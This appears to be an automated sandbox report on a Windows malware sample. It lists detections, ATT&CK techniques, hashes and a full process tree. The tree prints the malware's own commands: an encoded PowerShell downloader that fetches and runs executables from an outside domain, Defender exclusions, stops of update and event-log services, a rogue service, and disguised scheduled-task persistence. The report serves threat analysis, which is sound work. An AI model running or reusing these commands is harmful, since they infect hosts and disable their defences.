026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608

Analysis

max time kernel
4s
max time network
151s
platform
windows7_x64
resource
win7-20240220-en
submitted
06/04/2024, 01:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe
Size

2.4MB
MD5

f5ae4fdb7579db408cc119c7df5ba699
SHA1

7119c29754409ab879eae0548c3c24395c27e16e
SHA256

026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608
SHA512

445d2a66100af7a1b7f85e8cb0f6c06af0ae436d514d818c102f81ffa4e92984353f0635d1aa7121e832efda642d4843e0d87e84819144dd356c9ffe99bcfb5f
SSDEEP

49152:MajGm3M0mm2dUE5qMsS5SeBtvGz68gNR0T3vRs+1FXclTbVzi:Maj1vmm0fsSQm8OA3vRLbclTbVW

Score

10^/10

defense_evasion discovery execution persistence

Malware Config

Signatures

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2276	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3028	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	880	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1492	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2108	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2844	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2112	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1716	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3024	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2796	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2492	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1616	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1928	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1532	1660	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2700	1660	schtasks.exe	35

Detects executables manipulated with Fody 2 IoCs

resource	yara_rule
behavioral1/files/0x000c000000012707-86.dat	INDICATOR_EXE_Packed_Fody
behavioral1/memory/352-99-0x0000000000110000-0x0000000000208000-memory.dmp	INDICATOR_EXE_Packed_Fody

Detects executables packed with unregistered version of .NET Reactor 8 IoCs

resource	yara_rule
behavioral1/files/0x000a000000015b50-123.dat	INDICATOR_EXE_Packed_DotNetReactor
behavioral1/files/0x000a000000015b50-124.dat	INDICATOR_EXE_Packed_DotNetReactor
behavioral1/files/0x000a000000015b50-120.dat	INDICATOR_EXE_Packed_DotNetReactor
behavioral1/memory/2880-125-0x0000000000B90000-0x0000000000D96000-memory.dmp	INDICATOR_EXE_Packed_DotNetReactor
behavioral1/files/0x000a000000015b50-118.dat	INDICATOR_EXE_Packed_DotNetReactor
behavioral1/files/0x000a000000015b50-117.dat	INDICATOR_EXE_Packed_DotNetReactor
behavioral1/files/0x00060000000164ec-282.dat	INDICATOR_EXE_Packed_DotNetReactor
behavioral1/files/0x00060000000164ec-281.dat	INDICATOR_EXE_Packed_DotNetReactor

Blocklisted process makes network request 3 IoCs

flow	pid	Process
5	2256	powershell.exe
7	2256	powershell.exe
9	2256	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2316	powershell.exe
2556	powershell.exe
2912	powershell.exe
2176	powershell.exe
1512	powershell.exe
1952	powershell.exe
2584	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 2 IoCs

flow	pid	Process
5	2256	powershell.exe
5	2256	powershell.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1484	powercfg.exe
612	powercfg.exe
1124	powercfg.exe
2364	powercfg.exe
2092	powercfg.exe
2088	powercfg.exe
2540	powercfg.exe
1560	powercfg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2912	026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
896	sc.exe
2660	sc.exe
2656	sc.exe
2776	sc.exe
1472	sc.exe
2960	sc.exe
972	sc.exe
2204	sc.exe
1204	sc.exe
1632	sc.exe
1936	sc.exe
1664	sc.exe
1912	sc.exe
2896	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1540	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1540	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3024	schtasks.exe
2796	schtasks.exe
1616	schtasks.exe
3028	schtasks.exe
2844	schtasks.exe
2112	schtasks.exe
2700	schtasks.exe
2276	schtasks.exe
2492	schtasks.exe
1928	schtasks.exe
1716	schtasks.exe
1532	schtasks.exe
880	schtasks.exe
1492	schtasks.exe
2108	schtasks.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2256	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2256	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2912	026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2912 wrote to memory of 2256	2912	026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe	28
PID 2912 wrote to memory of 2256	2912	026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe	28
PID 2912 wrote to memory of 2256	2912	026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe	28
PID 2912 wrote to memory of 2256	2912	026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe	28

C:\Users\Admin\AppData\Local\Temp\026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe
"C:\Users\Admin\AppData\Local\Temp\026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2912
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYQBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB4AHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBjAGoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcALAAgADwAIwBuAGgAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAZgBnACMAPgAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB5AGUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQApADwAIwBqAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwBjAG0ASAB5AHAAZQByAHMAdQByAHIAbwBnAGEAdABlAHMAYQB2AGUAcwBEAGgAYwBwAC4AZQB4AGUAJwAsACAAPAAjAGQAagB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB3AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAagBqAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBtAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcAKQApADwAIwBpAHkAZwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AbQAvAGMAbwBuAGgAbwBzAHQAZwBtAC4AZQB4AGUAJwAsACAAPAAjAG0AYQBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB6AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB4AG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABnAG0ALgBlAHgAZQAnACkAKQA8ACMAYQBxAGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegBmAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwBhAGcAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQA8ACMAaABwAGMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBoAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHgAeABzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbQBIAHkAcABlAHIAcwB1AHIAcgBvAGcAYQB0AGUAcwBhAHYAZQBzAEQAaABjAHAALgBlAHgAZQAnACkAPAAjAHQAZABlACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAawB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGcAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AGcAbQAuAGUAeABlACcAKQA8ACMAYQBuAHYAIwA+AA=="
  2⤵
  - Blocklisted process makes network request
  - Downloads MZ/PE file
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2256
- - C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe
    "C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe"
    3⤵
    PID:352
- - C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe
    "C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe"
    3⤵
    PID:2752
  - - C:\Users\Admin\AppData\Roaming\.cmHypersurrogatesavesDhcp.exe
      "C:\Users\Admin\AppData\Roaming\.cmHypersurrogatesavesDhcp.exe"
      4⤵
      PID:2880
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\csrss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2912
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\winlogon.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2556
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\.cmHypersurrogatesavesDhcp.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2316
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\Sample Pictures\spoolsv.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2584
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\smss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1952
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3rwX6s7CEC.bat"
        5⤵
        
        PID:1780
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:1528
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1540
      - C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\smss.exe
        
        "C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\smss.exe"
        6⤵
        
        PID:1624
- - C:\Users\Admin\AppData\Roaming\conhostgm.exe
    "C:\Users\Admin\AppData\Roaming\conhostgm.exe"
    3⤵
    PID:1544
  - - C:\Users\Admin\AppData\Roaming\.conhostgm.exe
      "C:\Users\Admin\AppData\Roaming\.conhostgm.exe"
      4⤵
      PID:1348
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2176
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:668
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:1828
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:972
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1632
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:2960
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:896
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:2776
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        
        PID:2092
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        
        PID:2364
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Power Settings
        
        PID:1124
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:612
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "driverupdate"
        5⤵
        Launches sc.exe
        
        PID:1472
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:1204
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:1912
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "driverupdate"
        5⤵
        Launches sc.exe
        
        PID:1936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn ".cmHypersurrogatesavesDhcp." /sc MINUTE /mo 11 /tr "'C:\Windows\twain_32\.cmHypersurrogatesavesDhcp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn ".cmHypersurrogatesavesDhcp" /sc ONLOGON /tr "'C:\Windows\twain_32\.cmHypersurrogatesavesDhcp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn ".cmHypersurrogatesavesDhcp." /sc MINUTE /mo 5 /tr "'C:\Windows\twain_32\.cmHypersurrogatesavesDhcp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Pictures\Sample Pictures\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Sample Pictures\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Pictures\Sample Pictures\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2796

C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
PID:2852
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2276
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2460
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2896
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2660
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2656
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1664
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2204
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1484
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1560
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2540
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2088
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\VC_redist.x64.exe

Filesize
157.4MB

MD5
06618540f7946bcbb42f9fd5d31bfb58

SHA1
51b3faedf17576e33b14ffdc1cc91a0695760ca8

SHA256
57924965444ec06934534f2e68986c6740a8485f6d0d6815c98bfc2ebb9ae3e2

SHA512
60a86c34d4dad2b2073639724b5045c8a810e1bd2500baafe0e0bddaaf9977358f4b42d9c2cfd50d0579924c793276cfd8853fb2b2adc6f6ce19845b8d841455

Download Submit
C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\smss.exe

Filesize
161.0MB

MD5
0bc9e76d3c1e68471bfb74925f9fc77a

SHA1
2007ddd12b3b2d27922692841f0abfebe9601467

SHA256
6d96fd1b9247425d6850bf49ef4a1f99d33c5849b6a3bfa333f188eee7867ac1

SHA512
47a3bcfad3478c35f635e40820ed072db28b011592c33755dc00133f42d0bd6d254e08ec6b543105207d0e9371bbfdb7ca9579ca35040ab88108cec483cb367c

Download Submit
C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\smss.exe

Filesize
158.5MB

MD5
5a88465967da28a53f079d993716be74

SHA1
1a0b077beabc90c138e724d5dccae20cac5d0cd5

SHA256
e2746645d463f37455697a46bf3843f3b5ccf58c60938083a481eb49a9349bfd

SHA512
68e9e3d48ffde50da381c6f20cb254625a947446405db318e94f058248b165e2d1374b3f979bd44d9d80cc5174dab8795971d9d99d3d4fad009aaabd8aeb15a8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d09ecba9424165b8bc655a97b92f6101

SHA1
e6de624220af65ea821023123f2487d1d7fcbc45

SHA256
1b95e33901f161532a30d833a73355e018165211ce59da77fee6b3757506c9a4

SHA512
6f50e97cac5da950d705f596928ad06a9169db25412f4dd1796d1c02f7d1bd2684d1ca967dbeed015fe920154a9b63d96b8d9030fd9e0002f20448455a8584ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\3rwX6s7CEC.bat

Filesize
185B

MD5
ecf9a18b399011b1bb99307e736f801b

SHA1
90001bd02d768a040e2bab5b4254b1994afa2807

SHA256
e650d6266dd7957af7fcad68fc4010ce0ffc04785eb7bc353a4f2825778452a5

SHA512
c3e11ce39736289e304fbdc7c0550088c3a731d5fd9c0f8e62510beb667ae5057582d5b91a88ac3f2e3c43c73fc2ce95c2f1a2d1660af4ec42b9244f92d3f597

Download Submit
